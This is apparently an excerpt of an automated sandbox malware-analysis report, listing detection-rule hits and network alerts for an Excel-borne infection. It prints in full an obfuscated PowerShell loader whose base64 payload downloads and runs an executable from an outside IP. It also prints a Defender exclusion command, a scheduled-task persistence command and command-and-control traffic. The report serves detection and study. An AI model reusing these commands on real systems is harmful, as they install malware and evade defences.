CAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3580, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, ProcessId: 3680, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3580, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", ProcessId: 3792, ProcessName: csc.exe
                    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 198.244.140.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", ProcessId: 3948, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", ProcessId: 4056, ProcessName: schtasks.exe
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", ProcessId: 4056, ProcessName: schtasks.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3192, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", CommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwY
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Local\Temp\zedpap0h.oz0.ps1

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3580, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", ProcessId: 3792, ProcessName: csc.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", ProcessId: 4056, ProcessName: schtasks.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:56:32.963009+010020241971A Network Trojan was detected192.3.243.13680192.168.2.2249164TCP
                    2024-11-20T07:56:35.880037+010020241971A Network Trojan was detected192.3.243.13680192.168.2.2249166TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:56:32.963004+010020244491Attempted User Privilege Gain192.168.2.2249164192.3.243.13680TCP
                    2024-11-20T07:56:35.880012+010020244491Attempted User Privilege Gain192.168.2.2249166192.3.243.13680TCP
                    2024-11-20T07:57:11.112717+010020244491Attempted User Privilege Gain192.168.2.2249184192.3.243.13680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:56:57.988472+010020243121A Network Trojan was detected192.168.2.224916894.156.177.4180TCP
                    2024-11-20T07:56:59.882200+010020243121A Network Trojan was detected192.168.2.224916994.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:56:57.248279+010020253811Malware Command and Control Activity Detected192.168.2.224916894.156.177.4180TCP
                    2024-11-20T07:56:59.162067+010020253811Malware Command and Control Activity Detected192.168.2.224916994.156.177.4180TCP
                    2024-11-20T07:57:00.038068+010020253811Malware Command and Control Activity Detected192.168.2.224917094.156.177.4180TCP
                    2024-11-20T07:57:00.985981+010020253811Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                    2024-11-20T07:57:01.990103+010020253811Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                    2024-11-20T07:57:03.028263+010020253811Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                    2024-11-20T07:57:04.458084+010020253811Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                    2024-11-20T07:57:05.513581+010020253811Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                    2024-11-20T07:57:07.053237+010020253811Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                    2024-11-20T07:57:08.400152+010020253811Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                    2024-11-20T07:57:09.288353+010020253811Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                    2024-11-20T07:57:10.533829+010020253811Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                    2024-11-20T07:57:11.427592+010020253811Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                    2024-11-20T07:57:12.359101+010020253811Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                    2024-11-20T07:57:13.469417+010020253811Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                    2024-11-20T07:57:14.821226+010020253811Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                    2024-11-20T07:57:15.719445+010020253811Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                    2024-11-20T07:57:16.626398+010020253811Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                    2024-11-20T07:57:17.507138+010020253811Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                    2024-11-20T07:57:18.365734+010020253811Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                    2024-11-20T07:57:19.253733+010020253811Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                    2024-11-20T07:57:20.473746+010020253811Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                    2024-11-20T07:57:21.599286+010020253811Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                    2024-11-20T07:57:25.465376+010020253811Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                    2024-11-20T07:57:26.474558+010020253811Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                    2024-11-20T07:57:27.353742+010020253811Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                    2024-11-20T07:57:28.253668+010020253811Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                    2024-11-20T07:57:29.125788+010020253811Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                    2024-11-20T07:57:30.114920+010020253811Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                    2024-11-20T07:57:30.992768+010020253811Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                    2024-11-20T07:57:32.063042+010020253811Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                    2024-11-20T07:57:32.925555+010020253811Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                    2024-11-20T07:57:33.906030+010020253811Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                    2024-11-20T07:57:34.787024+010020253811Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                    2024-11-20T07:57:35.655030+010020253811Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                    2024-11-20T07:57:36.530041+010020253811Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                    2024-11-20T07:57:37.385969+010020253811Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                    2024-11-20T07:57:38.245541+010020253811Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                    2024-11-20T07:57:39.100304+010020253811Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                    2024-11-20T07:57:40.099524+010020253811Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                    2024-11-20T07:57:40.957522+010020253811Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                    2024-11-20T07:57:41.834157+010020253811Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                    2024-11-20T07:57:42.690842+010020253811Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                    2024-11-20T07:57:43.687015+010020253811Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                    2024-11-20T07:57:44.686743+010020253811Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                    2024-11-20T07:57:45.683162+010020253811Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                    2024-11-20T07:57:46.572052+010020253811Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                    2024-11-20T07:57:47.625431+010020253811Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                    2024-11-20T07:57:48.537909+010020253811Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                    2024-11-20T07:57:49.537253+010020253811Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                    2024-11-20T07:57:50.541403+010020253811Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                    2024-11-20T07:57:51.550185+010020253811Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                    2024-11-20T07:57:52.571474+010020253811Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                    2024-11-20T07:57:53.565464+010020253811Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                    2024-11-20T07:57:54.459148+010020253811Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                    2024-11-20T07:57:55.316399+010020253811Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                    2024-11-20T07:57:56.191793+010020253811Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                    2024-11-20T07:57:57.056887+010020253811Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                    2024-11-20T07:57:58.063832+010020253811Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                    2024-11-20T07:57:59.315019+010020253811Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                    2024-11-20T07:58:00.406324+010020253811Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                    2024-11-20T07:58:01.402550+010020253811Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                    2024-11-20T07:58:02.410939+010020253811Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                    2024-11-20T07:58:03.281828+010020253811Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                    2024-11-20T07:58:04.153651+010020253811Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                    2024-11-20T07:58:05.170720+010020253811Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                    2024-11-20T07:58:06.042036+010020253811Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                    2024-11-20T07:58:07.032370+010020253811Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                    2024-11-20T07:58:08.079653+010020253811Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                    2024-11-20T07:58:09.075720+010020253811Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                    2024-11-20T07:58:09.961207+010020253811Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                    2024-11-20T07:58:10.842151+010020253811Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                    2024-11-20T07:58:11.848537+010020253811Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                    2024-11-20T07:58:12.738339+010020253811Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                    2024-11-20T07:58:13.595288+010020253811Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                    2024-11-20T07:58:14.448889+010020253811Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:57:00.801702+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249170TCP
                    2024-11-20T07:57:01.717775+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249171TCP
                    2024-11-20T07:57:02.767336+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249172TCP
                    2024-11-20T07:57:03.841307+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249173TCP
                    2024-11-20T07:57:05.315581+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249174TCP
                    2024-11-20T07:57:06.379522+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249176TCP
